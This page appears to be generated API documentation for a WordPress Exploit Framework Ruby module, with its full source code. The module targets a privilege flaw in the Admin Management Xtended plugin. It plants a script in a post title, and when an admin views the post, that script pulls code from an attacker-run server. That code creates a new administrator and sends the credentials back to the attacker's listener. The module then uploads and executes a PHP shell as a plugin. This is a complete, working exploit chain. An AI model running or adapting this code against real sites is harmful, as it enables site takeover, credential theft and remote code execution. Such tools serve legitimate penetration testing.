Class: Wpxf::Exploit::AdminManagementXtendedXssShellUpload

Inherits:
Module
  • Object
show all
Includes:
Wpxf, WordPress::Login, WordPress::Plugin, WordPress::Posts, WordPress::Xss
Defined in:
lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::Xss

#wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute, #upload_payload_using_plugin_form

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods included from WordPress::Posts

#get_post_id_from_body, #get_post_id_from_permalink

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeAdminManagementXtendedXssShellUpload

Returns a new instance of AdminManagementXtendedXssShellUpload.



10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
 
# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 10

def initialize
  super

  update_info(
    name: 'Admin Management Xtended XSS Shell Upload',
    desc: 'This module exploits a lack of user level validation in versions '\
          '<= 2.4.0 of the Admin Management Xtended plugin which '\
          'allows authenticated users of any level to update the title of '\
          'any post, which allows the module to store a script that will '\
          'create a new admin user and use the new credentials to '\
          'upload and execute a payload when an admin views the page.',
    author: [
      'Kacper Szurek', # Vulnerability discovery
      'rastating'      # WPXF module
    ],
    references: [
      ['URL', 'http://security.szurek.pl/admin-management-xtended-240-privilege-escalation.html'],
      ['WPVDB', '8354']
    ],
    date: 'Oct 27 2015'
  )

  register_options([
    StringOption.new(
      name: 'username',
      desc: 'The WordPress username to authenticate with',
      required: true
    ),
    StringOption.new(
      name: 'password',
      desc: 'The WordPress password to authenticate with',
      required: true
    ),
    IntegerOption.new(
      name: 'post_id',
      desc: 'The post ID of the post to change the title of',
      required: false
    ),
    StringOption.new(
      name: 'permalink',
      desc: 'The permalink to the post to change the title of',
      required: false
    ),
    StringOption.new(
      name: 'post_title',
      desc: 'The new title to use for the post',
      required: true
    )
  ])
end

Instance Method Details

#checkObject 



61
62
63
 
# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 61

def check
  check_plugin_version_from_readme('admin-management-xtended', '2.4.0.1')
end

#on_http_request(path, params, headers) ⇒ Object 



132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
 
# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 132

def on_http_request(path, params, headers)
  if params['u'] && params['p']
    emit_success "Created a new administrator user, #{params['u']}:#{params['p']}"
    stop_http_server

    emit_info 'Removing script from post title...'
    update_post_title(@cookie, @post_id, datastore['post_title'])

    # Set this for #run to pick up to determine success state
    @success = upload_shell(params['u'], params['p'])

    return ''
  else
    emit_info 'Incoming request received, serving JavaScript...'
    return wordpress_js_create_user
  end
end

#runObject 



78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
 
# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 78

def run
  return false unless super

  @cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
  return false unless @cookie

  if datastore['post_id'].nil? && datastore['permalink'].nil?
    emit_error 'Either the post_id or permalink option must be set'
    return false
  end

  @post_id = 0
  if !datastore['post_id'].nil? && !datastore['permalink'].nil?
    emit_warning 'Both post_id and permalink options were specified'
    emit_warning 'Ignoring permalink and using post_id'
    @post_id = normalized_option_value('post_id')
  elsif datastore['permalink'].nil?
    @post_id = normalized_option_value('post_id')
  else
    emit_info 'Extracting post ID from permalink...'
    @post_id = get_post_id_from_permalink(datastore['permalink'])
    if @post_id.nil?
      emit_error 'Failed to extract the post ID'
      return false
    end
  end

  # Success will determined in another procedure, so initialize to false.
  @success = false

  emit_info 'Storing script...'
  emit_info xss_include_script, true
  res = update_post_title(
    @cookie,
    @post_id,
    "#{datastore['post_title']}<script>#{xss_include_script}</script>"
  )

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_success "Script stored and will be executed when a user views the post"
  start_http_server

  return @success
end

#update_post_title(cookie, post_id, title) ⇒ Object 



65
66
67
68
69
70
71
72
73
74
75
76
 
# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 65

def update_post_title(cookie, post_id, title)
  execute_post_request(
    url: wordpress_url_admin_ajax,
    params: { 'action' => 'ame_save_title' },
    body: {
      'category_id' => post_id.to_s,
      'new_title' => title,
      'submit' => 'Change'
    },
    cookie: cookie
  )
end

#upload_shell(username, password) ⇒ Object 



150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
 
# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 150

def upload_shell(username, password)
  cookie = authenticate_with_wordpress(username, password)
  return false unless cookie

  emit_info 'Uploading payload...'
  plugin_name = Utility::Text.rand_alpha(10)
  payload_name = Utility::Text.rand_alpha(10)
  unless upload_payload_as_plugin(plugin_name, payload_name, cookie)
    emit_error 'Failed to upload the payload'
    return false
  end

  payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
  emit_info "Executing the payload at #{payload_url}..."
  res = execute_get_request(url: payload_url)

  if res && res.code == 200 && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  end

  true
end